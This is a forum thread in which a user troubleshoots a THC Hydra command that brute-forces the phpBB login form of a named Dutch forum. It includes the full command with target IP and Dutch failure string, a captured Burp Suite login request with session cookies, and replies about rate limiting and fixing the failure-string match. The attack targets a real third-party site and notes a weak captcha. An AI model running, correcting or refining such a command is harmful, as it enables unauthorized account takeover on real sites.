Forum Thread: THC Hydra Doesn't Work!!

Hello everyone!

I've made a command for attacking a webapp. I've tested it with my own credentials but it doesn't work. Here's the command:

hydra -l hollyghost1205 -x 5:5:aA1.! 82.161.230.90 http-post-form "/forums/ucp.php:username=^USER^&password=^PASS^:Het opgegeven wachtwoord klopt niet, controleer je wachtwoord en probeer nogmaals. Als dit probleem zich blijft voordoen, contacteer dan de forumbeheerder." -V

This part is the Login Failed message: Het opgegeven wachtwoord klopt niet, controleer je wachtwoord en probeer nogmaals. Als dit probleem zich blijft voordoen, contacteer dan de forumbeheerder.

I've double-checked the command. What did go wrong?

Note: this is the output from BurpSuite:
POST /forums/ucp.php?mode=login&sid=b6e817b23133ca67b00c4bcb4667081a HTTP/1.1
Host: bokt.nl
Connection: close
Content-Length: 90
Cache-Control: max-age=0
Origin: bokt.nl
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: bokt.nl/forums/ucp.php?mode=login&redir=%2F
Accept-Encoding: gzip, deflate
Accept-Language: nl-NL,nl;q=0.9,en-US;q=0.8,en;q=0.7

Cookie: SERVERID=podagros; ga=GA1.2.1677856791.1524770423; gid=GA1.2.769271057.1524770423; gat=1; fu=1; fk=; fsid=b6e817b23133ca67b00c4bcb4667081a; fdfpint=he

username=lol&password=lol&redirect=%2F&sid=b6e817b23133ca67b00c4bcb4667081a&login=Inloggen

Who sees the problem?

Thanks in advance!
HollyGhost1205

4 Responses

UPDATE: the part of the login failed message "forumbeheerder" is a hyperlink. Also, Hydra don't give an error, it just keep going, also after i've seen the correct password in the log

Have you've tried looking at the response in Burp Suite? Is it rate limiting? These things are just the start of the questions... I suggest do further research first.

@COF FE: the response in Burp Suite is quite complicated but I've found the parameters indicated at the thread "How to Crack Online Web Form Passwords with THC-Hydra & Burp Suite". The website is secured by a deprecated captcha, but mostly, he just gives the login failed message. (so far I tried manually). I think I've made a little mistake in my command, but I don't know it.

BREAKING NEWS: the command works, finally, but all combinations are right. The part of the error message must be wrong. What's the correct way?

Share Your Thoughts

  • Hot
  • Active